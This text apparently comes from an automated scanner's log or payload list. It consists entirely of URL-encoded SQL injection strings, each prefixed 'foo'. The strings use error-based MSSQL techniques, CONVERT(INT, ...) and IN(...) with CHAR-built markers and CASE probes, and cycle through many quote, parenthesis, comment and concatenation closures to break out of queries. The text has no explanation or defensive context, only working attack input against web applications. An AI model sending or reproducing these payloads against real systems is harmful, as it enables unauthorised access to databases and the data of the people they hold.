foo%22%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22Kcsz%22%3D%22Kcsz foo%22%29%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22arOs%22%3D%22arOs foo%22%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%22efOf%22%3D%22efOf foo%22%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%22jKtP%22%20LIKE%20%22jKtP foo%22%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22mIFP%22%20LIKE%20%22mIFP foo%22%29%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22LyzV%22%20LIKE%20%22LyzV foo%22%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%22kdnF%22%20LIKE%20%22kdnF foo%25%27%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27hkWq%27%3D%27hkWq foo%00%27%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27JrLb%27%3D%27JrLb foo%27%29%20WHERE%201868%3D1868%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%22%29%20WHERE%207221%3D7221%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%29%20WHERE%204996%3D4996%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%27%20WHERE%201780%3D1780%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%22%20WHERE%208506%3D8506%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%20WHERE%207550%3D7550%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%27%7C%7C%28SELECT%20%27BkwU%27%20FROM%20DUAL%20WHERE%206500%3D6500%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27hKfw%27%20WHERE%209805%3D9805%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20lEAR%20WHERE%202273%3D2273%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20%29%2B%27 foo%27%2B%28SELECT%20%27Lycf%27%20WHERE%207612%3D7612%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%206582%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286582%3D6582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20%23 foo%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 foo%27%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 foo%27%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 foo%22%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 foo%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%287772%3D7772 foo%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%289120%3D9120 foo%29%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%284556%3D4556 foo%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 foo%27%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27wFei%27%3D%27wFei foo%27%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27zvAX%27%3D%27zvAX foo%27%29%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27EQRf%27%3D%27EQRf foo%27%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27hXpI%27%3D%27hXpI foo%27%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27CIlz%27%20LIKE%20%27CIlz foo%27%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27jiqO%27%20LIKE%20%27jiqO foo%27%29%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27TRap%27%20LIKE%20%27TRap foo%27%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27nQum%27%20LIKE%20%27nQum foo%22%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%22yyXC%22%3D%22yyXC foo%22%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22YDMY%22%3D%22YDMY foo%22%29%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22Jltd%22%3D%22Jltd foo%22%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%22HuRV%22%3D%22HuRV foo%22%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%22irpS%22%20LIKE%20%22irpS foo%22%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22mPLu%22%20LIKE%20%22mPLu foo%22%29%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22UUvq%22%20LIKE%20%22UUvq foo%22%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%22oeYh%22%20LIKE%20%22oeYh foo%25%27%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27MBWo%27%3D%27MBWo foo%00%27%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27Fcbh%27%3D%27Fcbh foo%27%29%20WHERE%209108%3D9108%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%22%29%20WHERE%204676%3D4676%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%29%20WHERE%205018%3D5018%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%27%20WHERE%207192%3D7192%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%22%20WHERE%206224%3D6224%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%20WHERE%205175%3D5175%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 foo%27%7C%7C%28SELECT%20%27gByn%27%20FROM%20DUAL%20WHERE%202618%3D2618%20AND%203112%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283112%3D3112%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 